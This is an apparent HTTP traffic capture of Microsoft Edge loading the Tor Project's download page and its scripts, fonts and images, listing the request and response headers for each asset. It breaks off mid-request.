User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:22 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/jquery-3.2.1.min.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "15283-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 86659
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:22 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-solid-900.woff2

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/webfonts/fa-solid-900.woff2
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:51 GMT
ETag: "134e0-5d78863a783c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 79044
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/font-woff2
Content-Language: en
GET

https://www.torproject.org/static/images/yec/heart.png?h=ad369acb

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/heart.png?h=ad369acb HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/heart.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "2a2-6247120c00846"
Accept-Ranges: bytes
Content-Length: 674
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/solid/arrow-down.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/solid/arrow-down.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/solid/arrow-down.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:06 GMT
ETag: "d35-5d788648c6580"
Accept-Ranges: bytes
Content-Length: 3381
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-speak.png?h=abdc7268 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-speak.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "bba6-6247120c017e6"
Accept-Ranges: bytes
Content-Length: 48038
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/download/

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /download/ HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:22 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/download/index.html
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 26 Nov 2024 17:36:07 GMT
ETag: "8475-627d448bb2602-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:22 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6903
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
GET

https://www.torproject.org/static/css/bootstrap.css?h=fb444024

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/css/bootstrap.css?h=fb444024 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:22 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/css/bootstrap.css
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Wed, 23 Oct 2024 18:48:19 GMT
ETag: "29c13-62529545b0719-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:22 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29494
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/css
Content-Language: en
GET

https://www.torproject.org/static/js/popper.min.js?h=a4336719

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/popper.min.js?h=a4336719 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/popper.min.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "4afd-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 19197
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/Space/SpaceGrotesk-Bold.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/Space/SpaceGrotesk-Bold.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/Space/SpaceGrotesk-Bold.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "15180-6247120bff8a6-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 42321
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Bold.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/SourceSansPro/SourceSansPro-Bold.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/SourceSansPro/SourceSansPro-Bold.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Mar 2022 14:35:59 GMT
ETag: "47064-5d9b5e65202d5-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 129126
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/images/download/png/get-connected@3x.png?h=5e2656db

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/download/png/get-connected@3x.png?h=5e2656db HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/download/png/get-connected@3x.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:47:06 GMT
ETag: "dcf9-5d788a87f6a80"
Accept-Ranges: bytes
Content-Length: 56569
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/webfonts/fa-regular-400.woff2

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/webfonts/fa-regular-400.woff2 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/webfonts/fa-regular-400.woff2
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:51 GMT
ETag: "3a14-5d78863a783c0-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 14886
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: application/font-woff2
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/primary/regular/file-alt.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/primary/regular/file-alt.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/primary/regular/file-alt.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:01 GMT
ETag: "9b8-5d78864401a40"
Accept-Ranges: bytes
Content-Length: 2488
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/twitter.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/twitter.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/twitter.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:03 GMT
ETag: "160d-5d788645e9ec0"
Accept-Ranges: bytes
Content-Length: 5645
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/heart.svg?h=ad369acb

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/heart.svg?h=ad369acb HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/heart.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "1af-6247120c00846-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 209
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/js/scrollspy.min.js?h=02674132

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/scrollspy.min.js?h=02674132 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/scrollspy.min.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "1916-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 6422
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Regular.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/SourceSansPro/SourceSansPro-Regular.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/SourceSansPro/SourceSansPro-Regular.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Mar 2022 14:36:00 GMT
ETag: "47a8c-5d9b5e6526096-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 130369
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-search.png?h=347ed4b2

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-search.png?h=347ed4b2 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
